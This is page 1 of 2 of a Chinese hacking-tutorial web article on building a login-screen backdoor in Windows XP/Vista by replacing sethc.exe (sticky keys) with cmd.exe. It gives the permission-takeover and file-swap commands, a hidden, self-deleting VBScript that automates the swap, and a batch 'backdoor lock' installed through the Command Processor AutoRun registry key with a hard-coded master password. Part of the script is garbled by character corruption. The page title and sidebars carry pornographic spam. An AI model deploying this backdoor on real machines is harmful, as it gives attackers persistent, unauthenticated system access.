亚洲AV无码乱码在线观看不卡|最新大伊香蕉精品视频在线|亚洲不卡av一区二区|国产美女无遮挡免费

登錄論壇 | 注冊會員 設(shè)為首頁 | 收藏本站
當(dāng)前位置 : 首頁>軟件學(xué)院>網(wǎng)絡(luò)技術(shù)>黑客攻防>正文
 
利用粘滯鍵打造入侵Vista超酷后門
http://www.yibo1263.com 2008-12-11 7:57:24  來源:東北IT網(wǎng)  編輯:葉子
 
什么是粘滯鍵?

當(dāng)你在Windows操作系統(tǒng)里面連續(xù)按下5次Shift鍵之后,你看看出來了什么?

在windows 2000/xp/Vista下,按shift鍵5次,可以打開粘置,會運行sethc.exe,而且,在登錄界面里也可以打開。這就讓人聯(lián)想到WINDOWS的屏保,將程序替換成cmd.exe后,就可以打開shell了。

一、具體的替換方法:

XP系統(tǒng):
將安裝源光盤彈出(或?qū)⒂脖P上的安裝目錄改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe

Vista系統(tǒng):
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
Vista之家(www.vista123.com)備注:上兩步為獲得權(quán)限的命令,你也可以通過Vista優(yōu)化大師獲得右鍵菜單的提升權(quán)限的功能,然后在sethc.exe文件上面右鍵直接提升權(quán)限。
然后按XP方法替換文件

在登錄界面按5此SHIFT,出來cmd shell,然后……

二、后門擴(kuò)展:

Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)
success = obj.run("cmd /c echo y  cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)
success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)
success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)
success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)
success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

第二句最有意思了.嘿嘿..自動應(yīng)答....以前就遇到過類似的問題

再更新,加個自刪除、簡化代碼:
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y  cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exedel %SystemRoot%\system32\sethc.exeren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

三、后門鎖擴(kuò)展:

allyesno注:可以采用cmd 鎖 來進(jìn)行cmdshell的密碼驗證 嘿嘿。。。

用下面的后門鎖的方法是 把代碼保存為bdlock.bat

然后修改注冊表位置即可

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
"AutoRun"="bdlock.bat"

@Echo Off
title 后門登陸驗證
color a
cls
set temprandom=%RANDOM%
echo 請輸入驗證碼:%temprandom%
set/p check=
if "%check%"=="%temprandom%%temprandom%" goto passcheck
if "%check%"=="%temprandom%" (
rem 后門服務(wù)器驗證
rem 如果沒有后門驗證服務(wù)器請rem注釋掉下一行代碼
if exist \192.168.8.8\backdoor$\pass goto passcheck
)
echo 驗證失敗
pause
exit
:passcheck
echo 驗證成功
If "%passcmdlock%"==http://www.6655.com/ Goto endx
Set passcmdlock=http://www.6655.com/
:allyesno
Set Errorlevel=>nul
Echo 請輸入驗證密碼?
Set password=allyesno Is a pig>nul
Set/p password=
rem 萬能密碼
if "%password%"=="allyesno is a sb" goto endx
If %time:~1,1%==0 Set timechange=a
If %time:~1,1%==1 Set timechange=b
If %time:~1,1%==2 Set timechange=c
If %time:~1,1%==3 Set timechange=d
If %time:~1,1%==4 Set timechange=e

本新聞共2頁,當(dāng)前在第1頁  1  2  
 
收藏】【打印】【進(jìn)入論壇
  相關(guān)文章:

·找回圖標(biāo)去提速 Vista解決案例兩則
·Vista系統(tǒng)下有效控制網(wǎng)絡(luò)下載 
·Vista綁定網(wǎng)卡MAC地址防范ARP 
·Win 7和Vista系統(tǒng)多余更新提示清除
·Vista使用4GB以上內(nèi)存不穩(wěn)定的解決辦法
·Vista系統(tǒng)刪除多余文件的隱蔽方法 
·刪除隱藏在Vista系統(tǒng)服務(wù)中的病毒
·從Vista到Win 7防火墻操作差異比較 
·Vista中快速卸載刪除多系統(tǒng)中的Win7 
·Vista瀏覽網(wǎng)頁時無法顯示的解決
·Vista 下文件和打印共享的技巧 
 
 
 
 
最新文章

中關(guān)村艷照門女主角詳記錄高清組圖 
大連護(hù)士門大尺度艷照高清組圖
iPhone女孩微博爆紅 最寶貴東西換iPhon
反恐精英之父內(nèi)維爾:改變電腦游戲銷售
團(tuán)購網(wǎng)站黎明之前:中國市場慘烈廝殺不
團(tuán)購鼻祖Groupon中國揭秘:快與慢的商業(yè)
Spil Games發(fā)布新的品牌形象
1800配置一臺主機(jī) 不要顯示器
聯(lián)想V360筆記本模特寫真
愛國者第四代移動硬盤將面市、低電壓保

 
推薦文章
1
2
3
4
5
6
7
8
9
10
iPhone女孩微博爆紅 最寶貴東西換
大連護(hù)士門大尺度艷照高清組圖
中關(guān)村艷照門女主角詳記錄高清組
蘋果員工中毒門
宮如敏不雅照瘋傳 看張馨予韓一菲
深耕市場 永續(xù)經(jīng)營——專訪百腦匯
優(yōu)派專業(yè)電子書 讓您回家旅途多姿
揭曉百萬大獎三星bada魅力綻放中
大明龍權(quán)“江湖英雄會”全國PK大
永恒之塔校園達(dá)人挑戰(zhàn)賽完美落幕
八卦圖解 More>>
iPhone女孩微博爆紅 最寶貴東西換 大連護(hù)士門大尺度艷照高清組圖
中關(guān)村艷照門女主角詳記錄高清組 宮如敏不雅照瘋傳 看張馨予韓一菲